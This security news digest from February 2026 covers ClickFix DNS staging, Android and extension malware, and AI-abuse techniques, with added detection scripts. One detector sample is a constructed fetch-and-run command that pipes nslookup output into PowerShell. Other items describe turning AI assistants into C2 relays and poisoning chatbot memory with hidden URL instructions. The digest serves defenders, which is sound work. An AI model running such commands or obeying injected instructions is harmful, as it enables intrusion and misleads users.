Researchers have demonstrated that AI assistants such as Microsoft Copilot and xAI Grok can be turned into command-and-control (C2) proxies. The technique, codenamed AI as a C2 proxy, leverages the assistants' web-browsing capability to build a bidirectional channel between implanted malware and its operator, so the malware's traffic blends into legitimate enterprise use of the AI service and is harder to spot. Through specially crafted prompts the operator can generate reconnaissance workflows, script actions and decide the next step of an intrusion on the fly. The attack presupposes that a machine has already been compromised and malware installed; that malware then uses the AI assistant as its C2 relay. Because the channel rides on a public assistant's browsing feature rather than on an attacker-owned API key or account, the usual responses of revoking an API key or suspending an account do not cut it off. The disclosure highlights the evolving tactics of threat actors in abusing AI systems for cyber operations.

UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages

Updated: 17.02.2026 19:03 · First: 21.08.2025 19:25 · 📰 27 src / 35 articles

Microsoft and Malwarebytes have disclosed a **DNS-based ClickFix variant**, the first documented use of the `nslookup` command to stage and deliver malicious payloads. The lure abuses DNS itself as the delivery channel: the victim is talked into running an `nslookup` query against an attacker-controlled server (**84[.]21[.]189[.]20**), whose response carries a PowerShell script in the `NAME:` field; that script downloads a ZIP archive containing the final payload and deploys **ModeloRAT** via a Python runtime, with a VBScript persistence mechanism. The chain opens with fake CAPTCHA pages and escalates through social-engineering pressure (fake system alerts, staged browser crashes, instructional videos) until the user pastes and executes the command. It builds on earlier ClickFix tactics: **ConsentFix** (Azure CLI OAuth abuse), **CrashFix** (malicious Chrome extensions triggering browser crashes), and **SyncAppvPublishingServer.vbs** execution with Google Calendar dead drops. What makes the DNS variant notable is the combination of a **trusted native tool** (`nslookup`), **DNS as a C2 channel**, and urgency-driven **psychological manipulation** to slip past security controls. In parallel, ClickFix campaigns continue to expand with **cross-platform targeting** (Windows, Linux, macOS), **AI platform abuse** (ChatGPT, Grok, Claude), and **weaponized SaaS infrastructure** (Google Groups, Pastebin) to distribute payloads such as **Lumma Stealer** and **Odyssey Stealer**. DNS staging, browser-native execution and multi-stage loaders underline the campaign's resilience despite 2025 law enforcement disruptions, with actors refining tradecraft around **social engineering**, **steganography**, and **legitimate service abuse**.
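The detection opportunity in this variant is the shape of the command the victim is made to run, not the payload. The following is an added example of that logic, not Microsoft's or Malwarebytes' detection. It scores Windows process-creation records (parent image plus command line, as a Sysmon Event ID 1 or Security 4688 pipeline would supply them) on the traits called out above: `nslookup` pointed at an attacker-chosen resolver, its output fed into a script interpreter, and launch from an interactive surface such as the Run dialog or a browser. The corporate resolver allow-list and all sample events are constructed; the suspicious sample only mimics the shape of the lure on a TEST-NET address and carries no payload.

```python
"""Detection logic for the DNS-staged ClickFix pattern described above.

Added example (not Microsoft's or Malwarebytes' detection). Scores Windows
process-creation records (parent image + command line) on: nslookup pointed at
an attacker-chosen resolver, its output consumed by a script host, launch from
an interactive surface, hidden/encoded flags. Allow-list and events are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass, field

CORPORATE_RESOLVERS = {"10.0.0.53", "10.0.0.54"}  # constructed: the org's own DNS servers
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# nslookup plus everything up to the next shell operator or quote
NSLOOKUP_CALL = re.compile(r"(?i)\bnslookup(?:\.exe)?\b([^|&;)\"']*)")
# nslookup output piped into, or evaluated by, a script host
SCRIPT_SINK = re.compile(
    r"(?i)\|\s*(?:powershell|pwsh|cmd(?:\.exe)?|mshta|wscript|cscript)\b|\biex\b|invoke-expression"
)
HIDDEN_OR_ENCODED = re.compile(
    r"(?i)-w(?:indowstyle)?\s+hidden|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"
)


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= 3  # two strong signals, or one strong plus two weak


def _positional_args(arg_string: str) -> list:
    """nslookup's positional arguments: [name-to-resolve, optional resolver]."""
    return [a for a in arg_string.split() if not a.startswith(("-", "/"))]


def score_event(parent_image: str, command_line: str) -> Verdict:
    v = Verdict()
    m = NSLOOKUP_CALL.search(command_line)
    if not m:
        return v  # not an nslookup invocation: out of scope for this rule
    positional = _positional_args(m.group(1))
    if len(positional) >= 2:  # second positional argument overrides the system resolver
        resolver = positional[1]
        try:
            ipaddress.ip_address(resolver)
            if resolver not in CORPORATE_RESOLVERS:
                v.score += 2
                v.reasons.append(f"explicit non-corporate resolver {resolver}")
        except ValueError:  # resolver given by hostname: cannot be allow-listed by IP
            v.score += 2
            v.reasons.append(f"explicit resolver by name {resolver}")
    if SCRIPT_SINK.search(command_line):
        v.score += 2
        v.reasons.append("nslookup output consumed by a script interpreter")
    if parent_image.lower() in INTERACTIVE_PARENTS:
        v.score += 1
        v.reasons.append(f"launched from {parent_image} (Run dialog or browser)")
    if HIDDEN_OR_ENCODED.search(command_line):
        v.score += 1
        v.reasons.append("hidden window or encoded command")
    return v


# Constructed sample events: (parent image, command line). The third mimics the
# shape of the reported lure (explicit resolver on a TEST-NET address, output
# piped onward to PowerShell); it is not a working payload. The fourth is an
# admin querying a public resolver and must not alert on its own.
SAMPLE_EVENTS = [
    ("cmd.exe", "nslookup www.example.com"),
    ("cmd.exe", "nslookup -type=mx example.com 10.0.0.53"),
    ("explorer.exe", "cmd.exe /c nslookup -q=a lookup.example 203.0.113.10 | findstr /i name | powershell -NoProfile -"),
    ("cmd.exe", "nslookup -type=txt example.com 8.8.8.8"),
]


def run_detection(events=SAMPLE_EVENTS) -> list:
    """Return (command_line, suspicious, reasons) for every event."""
    out = []
    for parent, cmd in events:
        v = score_event(parent, cmd)
        out.append((cmd, v.suspicious, v.reasons))
    return out


if __name__ == "__main__":
    for cmd, hit, why in run_detection():
        print(("ALERT " if hit else "ok    ") + cmd + ("  # " + "; ".join(why) if why else ""))
```

The threshold is deliberately above the single "non-corporate resolver" signal so that an administrator running `nslookup ... 8.8.8.8` from a console does not page anyone; the pasted ClickFix command trips three signals at once. In a real pipeline the allow-list should be populated from the organisation's DHCP/GPO resolver settings rather than hard-coded.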

Keenadu Android Backdoor Discovered in Firmware and Google Play Apps

Updated: 17.02.2026 18:41 · First: 17.02.2026 16:05 · 📰 2 src / 2 articles

A sophisticated Android malware called Keenadu has been discovered embedded in firmware from multiple device brands and distributed through various other vectors, including Google Play apps. The malware gives attackers unrestricted control over infected devices, enabling broad data theft and other malicious activity. As of February 2026, 13,715 devices have been confirmed infected, primarily in Russia, Japan, Germany, Brazil, and the Netherlands. Its capabilities include compromising all installed applications, installing arbitrary apps from APK files, and monitoring user activity, including incognito browsing. Kaspersky researchers compare Keenadu to the Triada malware family, which was found in counterfeit Android devices in 2025. Keenadu has been detected in Alldocube iPlay 50 mini Pro firmware dating back to August 18, 2023, and is embedded within tablet firmware that carries valid digital signatures. It has also been found in smart home camera apps on Google Play with 300,000 downloads; those apps are no longer available.

Android 17 Beta Introduces Secure-by-Default Architecture and Enhanced Security Features

Updated: · First: 17.02.2026 18:00 · 📰 1 src / 1 articles

Android 17 Beta introduces a secure-by-default architecture with major security updates, including the deprecation of the android:usesCleartextTraffic manifest attribute in favour of network security configuration files and the addition of HPKE hybrid cryptography support. The update also brings performance improvements and changes for large-screen devices, marking a shift towards tighter default security settings and a new continuous Canary channel for developers. The beta aims to strengthen app protections and improve developer workflows, with platform stability targeted for March. Developers are urged to migrate to network security configuration files for more granular control over cleartext and trust settings.

Microsoft Teams Outage Affects Global Users with Message Delays

Updated: 17.02.2026 17:37 · First: 19.12.2025 22:04 · 📰 2 src / 2 articles

Microsoft Teams is experiencing a widespread outage causing message delays and service disruptions across all regions, including the United States and Europe. The issue began at 14:30 ET, and Microsoft has confirmed it is investigating the problem. Recovery is observed in telemetry, but the root cause remains under investigation. Users are experiencing problems joining meetings with the Teams desktop client, accessing the Teams app, and signing in. The outage is causing delays and failures when sending and receiving chat messages that include inline media (images, code snippets, videos). Microsoft is also working to resolve additional incidents affecting Teams meetings and Copilot Studio agents.

Apple Tests End-to-End Encrypted RCS Messaging in iOS 26.4 Developer Beta

Updated: 17.02.2026 17:00 · First: 17.02.2026 08:44 · 📰 2 src / 2 articles

Apple has introduced end-to-end encryption (E2EE) for Rich Communication Services (RCS) messaging in the iOS and iPadOS 26.4 Developer Beta. The feature is currently in beta and limited to Apple devices, with a full rollout expected in future updates for iOS, iPadOS, macOS, and watchOS. The encryption follows the RCS Universal Profile 3.0, which uses the Messaging Layer Security (MLS) protocol. The beta also brings enhanced memory-safety protection with Memory Integrity Enforcement (MIE) and enables Stolen Device Protection by default for all iPhone users. Applications can now opt in to the full protections of MIE, moving beyond the previously available Soft Mode. Stolen Device Protection introduces a one-hour delay before Apple Account password changes are allowed and requires biometric authentication for key security actions.

Exposed Secrets in JavaScript Bundles Across Millions of Applications

Updated: 17.02.2026 16:40 · First: 20.01.2026 12:45 · 📰 2 src / 2 articles

A study by Intruder's research team found over 42,000 exposed tokens across 334 secret types in 5 million scanned applications. These tokens, which traditional vulnerability scanners often miss, pose significant risk, including unauthorized access to code repositories, project management tools, and other sensitive services. The exposed tokens included 688 GitHub and GitLab personal access tokens, many of which were still active and gave full access to repositories. An API key for Linear, a project management application, was found embedded directly in front-end code, exposing the organization's entire Linear instance. Exposed secrets were also found for a wide range of other services, including CAD software APIs, email platforms, webhooks for chat and automation platforms, PDF converters, sales intelligence and analytics platforms, and link shorteners. The findings highlight the limitations of existing secrets-detection methods and underscore the need for more comprehensive scanning of shipped front-end code.
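Secrets reach a bundle as string literals, so the scan that finds them is a pass over the delivered JavaScript text rather than over the repository. The following is an added example of that scan, not Intruder's tooling. It combines two detector kinds: vendor token formats with a fixed prefix (GitHub classic and fine-grained PATs, GitLab PATs, AWS access key IDs, Slack incoming-webhook URLs), which match on pattern alone, and a generic catch-all for quoted literals assigned to key/secret/token/password names, gated by Shannon entropy and a placeholder-word filter so that `YOUR_API_KEY_HERE` and a run of `a`s do not become findings. The bundle excerpt and every token in it are constructed (`AKIAIOSFODNN7EXAMPLE` is the access key ID AWS uses in its own documentation).

```python
"""Secret scanning over a JavaScript bundle (added example, not Intruder's scanner).

Vendor-prefixed token formats are matched by pattern; a generic detector for
quoted literals assigned to key/secret/token/password names is gated by
entropy and a placeholder filter. Bundle excerpt and tokens are constructed.
"""
import math
import re

SIGNATURES = {
    "github_pat_classic": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "github_pat_fine_grained": re.compile(r"\bgithub_pat_[A-Za-z0-9_]{22,255}\b"),
    "gitlab_pat": re.compile(r"\bglpat-[A-Za-z0-9_\-]{20,}\b"),
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    "slack_webhook": re.compile(
        r"https://hooks\.slack\.com/services/T[A-Za-z0-9]+/B[A-Za-z0-9]+/[A-Za-z0-9]+"
    ),
}
GENERIC_ASSIGNMENT = re.compile(
    r"""(?i)\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*["']([^"'\s]{16,})["']"""
)
PLACEHOLDER_WORDS = re.compile(r"(?i)your_|example|placeholder|changeme|xxxx|\$\{|<[a-z_ ]+>")
MIN_ENTROPY_BITS_PER_CHAR = 3.5  # 32-char hex tops out at 4.0; random base62 sits near 5.0


def shannon_entropy(s: str) -> float:
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    """Keep enough to locate the secret in the bundle without reprinting it."""
    return value[:4] + "..." + value[-4:] if len(value) > 12 else "..."


def scan_bundle(text: str) -> list:
    findings, seen = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in SIGNATURES.items():
            for m in pattern.finditer(line):
                seen.add(m.group(0))
                findings.append({"type": kind, "line": lineno, "preview": redact(m.group(0))})
        for m in GENERIC_ASSIGNMENT.finditer(line):
            name, value = m.group(1), m.group(2)
            if value in seen or PLACEHOLDER_WORDS.search(value):
                continue  # already reported by a signature, or an obvious placeholder
            if shannon_entropy(value) < MIN_ENTROPY_BITS_PER_CHAR:
                continue  # low-entropy literal: almost certainly not a credential
            findings.append({"type": f"generic:{name.lower()}", "line": lineno, "preview": redact(value)})
    return findings


# Constructed minified-bundle excerpt. Every token is fabricated; the AWS key
# ID is the one AWS uses in its documentation.
CONSTRUCTED_BUNDLE = r'''
const a="ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij";
const b="glpat-AbCdEfGhIjKlMnOpQrSt";
const c={accessKeyId:"AKIAIOSFODNN7EXAMPLE",region:"us-east-1"};
const hook="https://hooks.slack.com/services/T0000000/B0000000/abcdefghijklmnopqrstuvwx";
const apiKey="YOUR_API_KEY_HERE";
const token=process.env.TOKEN;
const cfg={password:"aaaaaaaaaaaaaaaaaaaaaaaa",secret:"q7Zp2LmN9xK3vB8rT1yW5cH0sD4fG6jA"};
'''

if __name__ == "__main__":
    for f in scan_bundle(CONSTRUCTED_BUNDLE):
        print(f"line {f['line']:3d}  {f['type']:24s} {f['preview']}")
```

Two points carry over to production use: run the scan over the built artefact (the served `.js`, source maps included) rather than the source tree, because bundlers inline environment variables at build time; and treat every signature hit as live until the issuing service says otherwise, since the study found many such tokens still valid.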

Low-Skilled Cybercriminals Use AI for Vibe Extortion Attacks

Updated: · First: 17.02.2026 15:45 · 📰 1 src / 1 articles

Low-skilled cybercriminals are leveraging AI to enhance their extortion campaigns, a technique dubbed 'vibe extortion' by researchers. This involves using large language models (LLMs) to script professional extortion strategies, including deadlines and pressure tactics. While the attackers themselves lack technical depth, AI provides coherence and professionalism to their threats. The use of AI in cybercrime has evolved beyond simple grammar improvements to include rapid vulnerability scanning, parallelized targeting, and automated ransomware tasks. Unit 42 researchers highlight that AI acts as a 'force multiplier' for attackers, significantly reducing operational friction and lowering the barrier to entry for cybercriminals.

Over-Privileged AI Systems Linked to Higher Incident Rates

Updated: · First: 17.02.2026 15:00 · 📰 1 src / 1 articles

A new report from Teleport reveals that AI systems with excessive access rights experience significantly higher incident rates. Over 69% of security leaders believe identity management must evolve to mitigate risks in AI infrastructure. Organizations with over-privileged AI systems report a 76% incident rate, compared to 17% for those with least-privilege controls, indicating a 4.5 times higher risk. The report highlights that static credentials and complex IT infrastructures contribute to these security issues.

Rise in Ransomware Attacks Targeting Industrial Operations

Updated: · First: 17.02.2026 14:50 · 📰 1 src / 1 articles

A significant increase in ransomware attacks targeting industrial organizations has been observed, with 119 groups identified in 2025, a 49% rise from 2024. These attacks exploited vulnerabilities in operational technology (OT) and industrial control systems (ICS), affecting 3,300 industrial organizations globally. The manufacturing sector was the most targeted, followed by transportation, oil and gas, electricity, and communications. Attackers commonly abused legitimate login credentials obtained through phishing, infostealer malware, or dark web purchases to compromise networks and deploy ransomware. The average dwell time for ransomware in OT environments was 42 days, causing operational disruptions and multi-day outages. Three new threat groups, Sylvanite, Azurite, and Pyroxene, were identified, each with distinct tactics targeting industrial systems.

SmartLoader Campaign Uses Trojanized Oura MCP Server to Deploy StealC Infostealer

Updated: · First: 17.02.2026 14:42 · 📰 1 src / 1 articles

A new SmartLoader campaign distributes a trojanized version of the Oura Model Context Protocol (MCP) server to deliver the StealC infostealer. The attackers cloned the legitimate Oura MCP Server, then built credibility with fake GitHub accounts, repositories and contributors before submitting the trojanized server to MCP registries, including MCP Market; the operation unfolded over four stages in that order. The trojanized server executes an obfuscated Lua script that drops SmartLoader, which in turn deploys StealC to harvest credentials, browser passwords and cryptocurrency wallet data. The shift in SmartLoader's targeting toward developers is deliberate: their systems hold API keys, cloud credentials and similar high-value secrets.

Webinar on Modern Cloud Forensics and AI-Driven Incident Response

Updated: · First: 17.02.2026 13:59 · 📰 1 src / 1 articles

A webinar highlights the challenges of traditional incident response in cloud environments and demonstrates how modern, AI-driven, context-aware forensics can accelerate cloud breach investigations. The session focuses on the need for host-level visibility, context mapping, and automated evidence capture to reconstruct attack timelines efficiently. Cloud forensics differs significantly from traditional forensics due to the ephemeral nature of cloud infrastructure, where evidence can disappear quickly. The webinar emphasizes the importance of correlating signals such as workload telemetry, identity activity, and network movement to gain a comprehensive view of cloud breaches.

Phobos Ransomware Suspect Arrested in Poland

Updated: · First: 17.02.2026 13:31 · 📰 1 src / 1 articles

Polish authorities have arrested a 47-year-old man suspected of ties to the Phobos ransomware group. The arrest is part of "Operation Aether," a broader international effort coordinated by Europol. The suspect was found with stolen credentials, credit card numbers, and server access data, which could facilitate ransomware attacks. The suspect faces charges under Article 269b of Poland's Criminal Code, with a maximum prison sentence of five years if found guilty. Operation Aether has targeted Phobos-linked individuals at multiple levels, including backend infrastructure operators and affiliates involved in network intrusions and data encryption. The operation has led to the extradition of a key Phobos administrator to the United States and the seizure of 27 servers in Thailand.

Corelight Investigator NDR Platform Reviewed for SOC Workflows

Updated: · First: 17.02.2026 13:30 · 📰 1 src / 1 articles

A reviewer new to network threat hunting explored Corelight's Investigator NDR system, part of its Open NDR Platform, to understand its role in SOC workflows and threat hunting. The system provides deep network visibility, integrates with other security tools, and uses AI to assist analysts in detecting and responding to network threats. The review highlights the platform's user-friendly interface, AI-driven insights, and integration capabilities, which improve SOC efficiency and analyst effectiveness.

EU Investigates X Over Grok-Generated Sexual Content

Updated: 17.02.2026 12:02 · First: 26.01.2026 19:14 · 📰 6 src / 9 articles

The European Commission, along with authorities in the UK, France, California, and now Ireland, are investigating X (formerly Twitter) over the use of its Grok AI tool to generate non-consensual sexual images, including child sexual abuse material (CSAM). The investigations are examining whether X has complied with data protection laws and adequately safeguarded against the generation of harmful content. The Irish Data Protection Commission (DPC) has opened a formal inquiry into X's compliance with GDPR obligations, joining the UK's Information Commissioner's Office (ICO), the European Commission, and French prosecutors in their respective investigations. French authorities have also raided X's offices in Paris and summoned Elon Musk and X CEO Linda Yaccarino for interviews. X has restricted Grok's image generation capabilities to paid subscribers, a move criticized by UK officials.

Infostealer Malware Targets OpenClaw Configuration Files

Updated: 17.02.2026 11:35 · First: 16.02.2026 19:32 · 📰 3 src / 5 articles

Infostealer malware has been observed stealing OpenClaw configuration files containing API keys, authentication tokens, and other sensitive secrets. This marks the first known instance of such attacks targeting the popular AI assistant framework. The stolen data includes configuration details, authentication tokens, and persistent memory files, which could enable full compromise of the victim's digital identity. The malware, identified as a variant of the Vidar infostealer, executed a broad file-stealing routine that scanned for sensitive keywords. Researchers predict increased targeting of OpenClaw as it becomes more integrated into professional workflows. Additionally, security issues with OpenClaw have prompted the maintainers to partner with VirusTotal to scan for malicious skills uploaded to ClawHub, establish a threat model, and add the ability to audit for potential misconfigurations.

AI Recommendation Poisoning via 'Summarize with AI' Buttons

Updated: · First: 17.02.2026 11:31 · 📰 1 src / 1 articles

Microsoft has identified a new AI manipulation technique called AI Recommendation Poisoning, where businesses use 'Summarize with AI' buttons to inject biased recommendations into AI chatbots. This method involves embedding hidden instructions in URLs to manipulate the AI's memory and skew recommendations. Over 50 unique prompts from 31 companies across 14 industries were detected over a 60-day period. The attack leverages the AI's inability to distinguish genuine preferences from injected ones, potentially leading to biased advice on critical subjects like health, finance, and security.

Washington Hotel in Japan hit by ransomware attack

Updated: · First: 16.02.2026 23:10 · 📰 1 src / 1 articles

The Washington Hotel brand in Japan has disclosed a ransomware infection that compromised its servers and exposed business data. The attack occurred on February 13, 2026, and the company has engaged an internal task force and external cybersecurity experts to assess the impact and coordinate recovery. Customer data is unlikely to be affected because it is stored on separate servers managed by another company. The incident caused limited operational disruption, such as the temporary unavailability of credit card terminals, but no significant impact on operations has been reported. The financial impact is under review, and no ransomware group has claimed responsibility.

Eurail Data Breach: Stolen Customer Data Sold on Dark Web

Updated: · First: 16.02.2026 21:19 · 📰 1 src / 1 articles

Eurail B.V., the operator of Eurail and Interrail passes, confirmed that data stolen in a breach earlier this year is now being sold on the dark web. The stolen data includes full names, passport details, ID numbers, bank account IBANs, health information, and contact details. Eurail is still investigating the extent of the data compromise and the number of affected customers. The company has notified data protection authorities and advised customers to update passwords and monitor bank accounts for suspicious activity.

Dutch man arrested for refusing to delete accidentally leaked police data

Updated: · First: 16.02.2026 21:13 · 📰 1 src / 1 articles

A 40-year-old man in the Netherlands was arrested for downloading and refusing to delete confidential police documents that were accidentally shared with him. The man demanded a reward in exchange for deleting the files, leading to his arrest for computer trespassing. The incident began when a police officer mistakenly sent a download link instead of an upload link, and the man downloaded the files despite knowing the error. The Dutch police emphasized the legal obligation to report and refrain from accessing misdirected confidential materials.

Vulnerabilities in Cloud-Based Password Managers Enable Full Vault Compromise

Updated: 16.02.2026 20:06 · First: 16.02.2026 19:15 · 📰 2 src / 3 articles

Researchers from ETH Zurich and USI discovered 27 vulnerabilities in Bitwarden, LastPass, Dashlane, and 1Password that could allow attackers to view and modify stored passwords. The flaws challenge the 'zero-knowledge encryption' claims of these services, with attacks ranging from integrity violations to complete vault compromise. The vulnerabilities were disclosed to the vendors, and remediation is underway. The researchers developed attack scenarios exploiting key escrow, vault encryption, sharing, and backwards compatibility features. Bitwarden was found to have a critical flaw in its organization onboarding process, allowing malicious auto-enrolment attacks. 1Password's use of a high-entropy cryptographic key provides it with a security advantage. Dashlane patched a downgrade attack vulnerability in November 2025. Bitwarden is addressing seven issues and accepting three as intentional design decisions. LastPass is working to enhance integrity guarantees.

UK NCSC Reports Significant Increase in Nationally Significant Cyber Incidents

Updated: 16.02.2026 18:30 · First: 14.10.2025 11:45 · 📰 4 src / 4 articles

The UK’s National Cyber Security Centre (NCSC) reported 204 nationally significant cyber incidents between September 2024 and August 2025, a 130% increase from the previous year. Recent high-profile attacks on Marks & Spencer, the Co-op Group, and Jaguar Land Rover highlighted the real-world impact of cyber threats. The NCSC emphasized the need for urgent action from business leaders to enhance cybersecurity defenses. The NCSC's 2025 Annual Review included a letter from the CEO of the Co-op Group, emphasizing the responsibility of senior leaders in protecting their businesses. The NCSC launched the Cyber Action Toolkit to help small organizations improve their cyber defenses. Additionally, the NCSC issued an alert to critical national infrastructure (CNI) providers about severe cyber threats targeting CNI, following coordinated cyber-attacks on Poland's energy infrastructure in December. NCSC CEO Richard Horne warned that SMEs are wrong to assume they won't be targeted by cyber-attacks and urged them to adopt Cyber Essentials certification to protect against common cybersecurity threats.

Oyster Malware Distributed via Fake Microsoft Teams Installers

Updated: 16.02.2026 18:15 · First: 27.09.2025 22:49 · 📰 5 src / 6 articles

A new malvertising campaign uses SEO poisoning to distribute fake Microsoft Teams installers that deploy the Oyster backdoor on Windows devices. The malware, known as OysterLoader, gives attackers remote access to corporate networks, enabling command execution, payload deployment, and file transfers. The campaign targets users searching for 'Teams download', leading them to a fake site that mimics Microsoft's official download page. The malicious installer, signed with legitimate certificates, drops a DLL into the user's %APPDATA% (AppData\Roaming) folder and creates a scheduled task for persistence. Microsoft revoked over 200 certificates used to sign malicious Teams installers in a wave of Rhysida ransomware attacks in October 2025. The threat group Vanilla Tempest, also tracked as VICE SPIDER and Vice Society, is a financially motivated actor that focuses on deploying ransomware and exfiltrating data for extortion. The Oyster malware, also known as Broomstick and CleanUpLoader, has been linked to multiple campaigns and ransomware operations, such as Rhysida. The campaign was first disclosed by Blackpoint Cyber in September 2025, which showed how users searching for Teams online were redirected to bogus download pages offering a malicious MSTeamsSetup.exe instead of the legitimate client. The threat actor used Trusted Signing, SSL.com, DigiCert, and GlobalSign code-signing services to sign the malicious installers and other post-compromise tools. In early 2026, OysterLoader evolved with new C2 infrastructure and obfuscation methods, including a multi-stage infection chain and dynamic API resolution to hinder detection and analysis.

Operation DoppelBrand Phishing Campaign Targets Fortune 500 Firms

Updated: · First: 16.02.2026 17:45 · 📰 1 src / 1 articles

A phishing campaign named Operation DoppelBrand has been targeting Fortune 500 companies, including Wells Fargo and USAA, between December 2025 and January 2026. The campaign, attributed to a financially motivated threat actor known as GS7, uses lookalike domains and cloned login portals to harvest credentials. The operation also deploys remote management tools for persistent access and monetizes compromised accounts. The infrastructure is highly automated, with over 150 domains identified, and targets major US financial institutions, investment firms, and technology brands.

ISO/IEC 27001 Compliance with Passkey Authentication

Updated: · First: 16.02.2026 17:02 · 📰 1 src / 1 articles

Organizations transitioning from password-based authentication to passkeys must align with ISO/IEC 27001 compliance requirements. Passkeys, built on FIDO2 and WebAuthn standards, offer significant security improvements by eliminating password-related vulnerabilities. The transition involves mapping passkey adoption to specific ISO/IEC 27001 controls, assessing risks, and documenting procedures to meet compliance standards. Real-world implementations show reduced help desk calls and improved authentication success rates, but challenges such as downgrade attacks and account recovery complexity remain.

Fake AI Assistant Extensions in Google Chrome Web Store Exfiltrate Credentials and Monitor Emails

Updated: 16.02.2026 16:00 · First: 13.02.2026 13:25 · 📰 3 src / 6 articles

Over 260,000 Google Chrome users downloaded fake AI assistant extensions that steal login credentials, monitor emails, and enable remote access. Researchers at LayerX identified over 30 malicious extensions as part of a coordinated campaign called AiFrame. The extensions mimicked popular AI assistants such as Claude AI, ChatGPT, Grok, and Google Gemini. The campaign used extension spraying (many near-identical listings) to outlast takedowns, and pointed users to remote infrastructure so the malicious logic did not have to ship in the extension package. The extensions exfiltrate data from Chrome and Gmail to attacker-controlled servers. LayerX warns that they act as general-purpose access brokers, capable of harvesting data and monitoring user behavior. Many have been removed from the Chrome Web Store, but users who installed them remain at risk until they are removed locally.
Separately, researchers discovered a malicious Chrome extension named CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl) that steals TOTP codes for Facebook and Meta Business accounts, Business Manager contact lists, and analytics data. It exfiltrates to infrastructure controlled by the threat actor, including a backend at getauth[.]pro and a Telegram channel. The extension had 33 users as of writing and was first uploaded to the Chrome Web Store on March 1, 2025.
About 500,000 VKontakte users have had their accounts silently hijacked through Chrome extensions masquerading as VK customization tools, a large-scale campaign codenamed VK Styles. The embedded malware performs active account manipulation: it automatically subscribes users to the attacker's VK groups, resets account settings every 30 days to override user preferences, manipulates CSRF tokens to bypass VK's security protections, and maintains persistent control.
A report published by Q Continuum found a collection of 287 Chrome extensions that exfiltrate browsing history to data brokers. These extensions have 37.4 million installations, roughly 1% of the global Chrome userbase.
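Removal from the Web Store does nothing for copies already installed, so the practical response is to enumerate what is present in each user profile. The following is an added example of that triage, not LayerX's or Q Continuum's tooling. It walks a Chrome profile's Extensions directory (`<profile>/Extensions/<id>/<version>/manifest.json`), matches IDs against a block-list seeded with the CL Suite ID above, and surfaces the permission combination that gives an extension the reach described in these reports (a broad host pattern plus cookies, request interception or script injection). The sample profile, the benign extensions, and the permission sets, including the one given to the CL Suite entry, are constructed for the example.

```python
"""Triage of installed Chrome extensions (added example, not LayerX's or
Q Continuum's tooling). Walks <profile>/Extensions/<id>/<version>/manifest.json,
matches IDs against a block-list and flags broad-host + data-reach permission
combinations. The sample profile and all permission sets are constructed.
"""
import json
import pathlib
import re
import tempfile

EXT_ID = re.compile(r"^[a-p]{32}$")  # Chrome extension IDs: 32 chars drawn from a-p
KNOWN_BAD_IDS = {
    "jkphinfhmfkckkcnifhjiplhfoiefffl": "CL Suite (reported to steal Meta Business TOTP codes)",
}
BROAD_HOST = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
DATA_REACH = {"cookies", "webRequest", "webRequestBlocking", "scripting",
              "history", "tabs", "declarativeNetRequest"}
PRIORITY_ORDER = {"critical": 0, "review": 1, "low": 2}


def assess(ext_id: str, manifest: dict) -> dict:
    # MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    broad = bool(perms & BROAD_HOST)
    reach = sorted(perms & DATA_REACH)
    if ext_id in KNOWN_BAD_IDS:
        priority = "critical"
    elif broad and reach:
        priority = "review"
    else:
        priority = "low"
    name = str(manifest.get("name", ""))
    return {
        "id": ext_id,
        # localized names appear as __MSG_*__ placeholders; fall back to the ID
        "name": ext_id if name.startswith("__MSG_") or not name else name,
        "version": manifest.get("version"),
        "known_bad": KNOWN_BAD_IDS.get(ext_id),
        "broad_host_access": broad,
        "data_reach": reach,
        "priority": priority,
    }


def triage_profile(extensions_dir) -> list:
    extensions_dir = pathlib.Path(extensions_dir)
    results = []
    for ext_dir in sorted(p for p in extensions_dir.iterdir() if p.is_dir()):
        if not EXT_ID.match(ext_dir.name):
            continue  # e.g. the Temp directory Chrome keeps alongside extensions
        for manifest_path in sorted(ext_dir.glob("*/manifest.json")):
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
            results.append(assess(ext_dir.name, manifest))
    return sorted(results, key=lambda r: PRIORITY_ORDER[r["priority"]])


def build_constructed_profile() -> pathlib.Path:
    """Lay out a fake Extensions directory with three constructed extensions."""
    root = pathlib.Path(tempfile.mkdtemp()) / "Extensions"
    samples = {
        # block-listed ID from the report; the permission set here is constructed
        "jkphinfhmfkckkcnifhjiplhfoiefffl": {
            "name": "CL Suite", "version": "1.0.3", "manifest_version": 3,
            "permissions": ["cookies", "webRequest", "storage"], "host_permissions": ["<all_urls>"]},
        # unknown extension with a localized name and risky reach: needs a human look
        "abcdefghijklmnopabcdefghijklmnop": {
            "name": "__MSG_appName__", "version": "2.1.0", "manifest_version": 3,
            "permissions": ["scripting", "tabs"], "host_permissions": ["*://*/*"]},
        # benign note-taking extension with storage only
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
            "name": "Notes", "version": "0.9.0", "manifest_version": 3, "permissions": ["storage"]},
    }
    for ext_id, manifest in samples.items():
        version_dir = root / ext_id / manifest["version"]
        version_dir.mkdir(parents=True)
        (version_dir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    (root / "Temp").mkdir()  # non-extension directory that must be skipped
    return root


if __name__ == "__main__":
    for row in triage_profile(build_constructed_profile()):
        print(f"{row['priority']:8s} {row['id']} {row['name']!r} reach={row['data_reach']}")
```

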